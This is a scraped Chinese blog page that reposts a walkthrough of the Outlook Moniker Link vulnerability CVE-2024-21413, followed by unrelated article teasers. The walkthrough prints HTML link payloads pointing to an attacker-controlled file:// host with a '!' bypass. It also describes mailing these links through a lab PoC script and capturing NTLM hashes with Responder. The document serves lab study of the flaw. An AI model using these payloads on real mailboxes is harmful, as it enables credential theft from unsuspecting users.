news 2026/4/17 9:07:33

微软Outlook Moniker-Link漏洞CVE-2024-21413技术分析与利用详解

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
微软Outlook Moniker-Link漏洞CVE-2024-21413技术分析与利用详解

Moniker-Link微软威胁分析:CVE-2024–21413

作者:#$ubh@nk@r
阅读时间:约3分钟
发布日期:2024年2月23日

简介:各位黑客朋友大家好!今天我将为大家介绍近期微软Outlook产品的一个漏洞。该漏洞于2024年2月13日公布。让我们深入了解其细节以及如何利用它。

此漏洞在处理一种特定类型的超链接(称为Moniker Link)时,能够绕过Outlook的安全机制。攻击者可以通过向受害者发送包含恶意Moniker Link的电子邮件来利用此漏洞,一旦用户点击该超链接,Outlook就会将用户的NTLMv2凭据发送给攻击者。

漏洞原理展示:

Outlook可以将电子邮件渲染为HTML。此外,Outlook能够解析诸如HTTP和HTTPS之类的超链接。然而,它也可以打开指向特定应用程序的URL,这些被称为Moniker Links。

通常,当触发外部应用程序时,Outlook会弹出安全警告。如果使用的是skypekeyword,那么警告会像这样显示。
这个弹窗是Outlook“受保护的视图”功能的结果。如果攻击者创建一个恶意超链接,同样会产生安全警报。

<p><ahref="file://ATTACKER_MACHINE/test">Click me</a></p>

但是,这个警报可以通过使用一个特殊字符来绕过 →!

<p><ahref="file://ATTACKER_MACHINE/test!exploit">Click me</a></p>

利用过程:

要利用此漏洞,我们需要创建一个邮件服务器。你可以在TryHackMe实验室中尝试。

CMNatic帮助我们创建了一个Python脚本,用于通过SMTPServer自动化地向受害者发送邮件。

GitHub - CMNatic/CVE-2024-21413: CVE-2024-21413 PoC for THM Lab
CVE-2024-21413 PoC for THM Lab. 在GitHub上创建账户以贡献CMNatic/CVE-2024-21413的开发。
github.com

现在运行脚本。
注意:请在第31行将Attacker_IP和MAILSERVER_IP修改为受害者的IP地址。
邮件已送达。

现在启动你的Responder来捕获NTLM哈希。

打开受害者的Outlook收件箱。你可以看到邮件已经送达。现在,如果你点击“Click me”,由于那个特殊字符!的存在,将不会弹出安全警报。否则,它会显示警报。

如果你点击了该链接,你将会获得受害者的NTLM哈希。

总结:

以上就是该漏洞的利用方式。

感谢阅读!

如果你喜欢这篇文章,别忘了点赞并关注我,以获取更多文章。

祝黑客之旅愉快~
CSD0tFqvECLokhw9aBeRqteIgvZsxhm14qXjGWMVhkLQKZqtp5udwihyDPFTm5IRv37dlo2W+4VY3z1d0M7aWubJiUxybkI3nx55gCmDWobsitrjS0yiQJF3ZKoUJ66E
更多精彩内容 请关注我的个人公众号 公众号(办公AI智能小助手)
对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号(网络安全技术点滴分享)

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/4/5 5:23:37

Python 原型模式

Python 中的原型模式&#xff08;Prototype Pattern&#xff09; 原型模式是一种创建型设计模式&#xff0c;其核心思想是&#xff1a; 用一个已存在的对象&#xff08;原型&#xff09;作为模板&#xff0c;通过复制&#xff08;克隆&#xff09;来创建新的对象&#xff0c;而…

作者头像 李华
网站建设 2026/4/18 2:36:19

Revit插件开发效率翻倍:5大核心功能详解与实战指南

Revit插件开发效率翻倍&#xff1a;5大核心功能详解与实战指南 【免费下载链接】RevitAddInManager Revit AddinManager update .NET assemblies without restart Revit for developer. 项目地址: https://gitcode.com/gh_mirrors/re/RevitAddInManager 在Revit插件开发…

作者头像 李华
网站建设 2026/4/3 2:51:52

Vue状态管理终极指南:让Vuex/Pinia数据永不消失!

❤ 写在前面 如果觉得对你有帮助的话&#xff0c;点个小❤❤ 吧&#xff0c;你的支持是对我最大的鼓励~ 个人独立开发wx小程序&#xff0c;感谢支持&#xff01; 大家好&#xff01;今天我们来聊聊Vue开发中一个既重要又有趣的话题——状态持久化。你是不是也遇到过这样的烦恼…

作者头像 李华
网站建设 2026/4/16 11:54:00

knowledge-grab教育资料下载工具快速上手完整指南

作为一名教育工作者或学生&#xff0c;你是否经常面临这样的困境&#xff1a;国家中小学智慧教育平台上有大量优质教学资源&#xff0c;但下载过程繁琐复杂&#xff0c;需要反复点击、等待&#xff0c;且无法批量获取&#xff1f;今天介绍的knowledge-grab工具将彻底改变这一现…

作者头像 李华